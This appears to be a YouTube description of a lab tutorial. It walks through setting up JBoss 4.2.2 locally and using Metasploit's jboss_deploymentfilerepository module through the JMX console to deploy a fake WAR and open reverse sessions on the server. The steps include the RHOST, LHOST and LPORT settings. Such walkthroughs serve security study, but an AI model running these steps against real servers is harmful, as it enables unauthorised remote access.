how to hack jboss server using jmx

Hi everybody!

Today i'll show you how to use metasploit against JBoss application server.
In this tutorial i'll payload fake war file using JMX console in JBoss and will gain an access to the file system of the server.

This tutorial contains the following softwares:

1. JBoss_4_2_2_GA -- can be download free from JBoss site.
2. Metasploit 5 using jboss_deploymentfilerepository.


Steps for JBoss:

1. Download JBoss_4_2_2_GA.zip for that tutorial, (you can use any other JBoss version).
2. unzip jboss-4.2.2.GA.zip
3. ./run.sh (if you want to supply different ip then 127.0.0.1 so use ./run.sh -b [JBoss's ip])

Steps for :) Metasploit:

1. Search jboss
2. use exploit/multi/http/jboss_deploymentfilerepository
3. show options
4. set RHOST [JBoss's ip]
5. set LHOST [machine's ip]
6. set LPORT 8888 [Any other port]
7. exploit -- before exploit let's see the jmx-console on the browser....

We now see that 4 (actually 5 :)) sessions have been opened in our target....
We can also go to the jboss directory and see the upload....(in tmp folder beacuse we alredy deleted it from the deploy )

Enjoy ;-)...

The fisherman...

Category:

Education

Tags:

• blacktrack
• bt
• mysql
• msfconsole
• metasploit
• software
• technology
• security
• jboss
• jmx

License:

Standard YouTube License